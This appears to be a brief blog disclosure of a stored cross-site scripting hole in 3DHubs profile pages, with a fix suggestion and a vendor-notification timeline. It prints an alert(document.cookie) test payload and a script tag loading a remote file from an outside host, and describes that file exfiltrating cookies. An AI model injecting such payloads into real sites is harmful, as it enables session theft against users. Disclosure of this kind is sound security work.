About 3DHubs

3DHubs is a community site which allows users to offer 3D-printing services, for money. For tinkerers it allows you to upload a 3D model, and find a person to print it for you, in exchage for money.

As I've recently started using 3D-printed things this is a great resource.

The Exploit

When you register for 3DHubs, as a user or a creator, you get given a public profile-page.

The profile page displays text that the user has written without performing any kind of escaping. So for example I wrote on my profile text:

  	<script>alert(document.cookie);</script>

As expected this raised an alert-box with lots of content.

To steal content was pretty easy, just include a malicious script:

        <script src="https://steve.fi/t.js"></script>

That script could make requests for off-site images, with the cookies submitted as parameters.

Fixing This Hole

Fixing this hole should be pretty simple, just filter and escape the user-content.

Timeline

Vendor notified:May 4th 2017 - Twitter
Fixed??